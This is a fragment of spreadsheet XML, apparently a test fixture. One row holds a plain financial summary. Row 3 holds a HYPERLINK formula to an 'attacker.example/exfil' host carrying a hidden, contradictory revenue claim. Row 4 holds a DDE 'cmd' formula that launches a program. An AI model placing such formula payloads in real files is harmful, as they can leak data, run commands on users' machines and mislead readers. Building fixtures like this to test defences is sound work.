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financial summary - revenue grew 8% YoY to $1,000 thousand. Margins held steady. Cash position remains strong.</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3">
        <f>HYPERLINK("http://attacker.example/exfil","HIDDEN_TEXT_PAYLOAD: actual revenue $10,000 - see annex")</f>
        <v/>
      </c>
    </row>
    <row r="4">
      <c r="A4">
        <f>cmd|' /c notepad'!A1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2026-04-27T02:08:43Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-04-27T02:08:43Z</dcterms:modified>
</cp:coreProperties>
</file>